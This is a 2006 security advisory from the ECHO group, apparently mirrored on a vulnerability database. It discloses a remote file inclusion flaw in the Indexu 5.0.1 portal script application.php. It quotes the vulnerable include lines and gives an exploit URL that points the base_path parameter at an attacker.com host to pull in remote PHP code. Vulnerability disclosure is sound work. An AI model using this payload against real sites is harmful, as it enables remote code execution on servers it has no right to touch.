Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11360
HistoryFeb 10, 2006 - 12:00 a.m.

[ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion

2006-02-1000:00:00
vulners.com
85

\_ /\ ___ \ / | \\_ \
| ) / \ \// ~ \/ | \
| \\ \
\ Y / | \
/
_____ / \______ /\| /\_____ /
\/ \/ \/ \/

                                    .OR.ID

ECHO_ADV_27$2006


[ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion

Author : M.Hasran Addahroni
Date : February, 9th 2006
Location : Indonesia, Bali
Web : http://echo.or.id/adv/adv27-K-159-2006.txt
Critical Lvl : Dangerous

Affected software description:

Indexu

Application : indexu 
version     : 5.0.0 5.0.1
URL         : http://www.nicecoder.com/
Description :

INDEXU is a portal solution software that allows you to build powerful indexing websites such as
yahoo.com, google.com, and dmoz.org with ease. It&#39;s ability to allow you and your members to easily
add, organize, and manage your links makes INDEXU the first choice of all webmasters. 

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~~~

in application.php code script i found include fopen url
vulnerability that not sanitized.an attacker can exploit this vulnerability with a simple php
injection script.Here is the code of application.php

---------------application.php--------------------------------
 ...
include&#40;$base_path.&quot;lang/english.php&quot;&#41;;   // full path
include&#40;$base_path.&quot;pagination.class.php&quot;&#41;;   // full path

...
------------------------------------------------------------------

Exploit:
~~~~~~~~

http://www.target.com/[path]/application.php?base_path=http://attacker.com/evil?

Solution:
~~~~~~~~~

sanitize the script code in application.php to protect this vulerability

Notification:
~~~~~~~~~~~~

 vendor was contact

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S&#96;to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ sinChan,x&#96;shell,tety,sakitjiwa
~ [email protected] 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------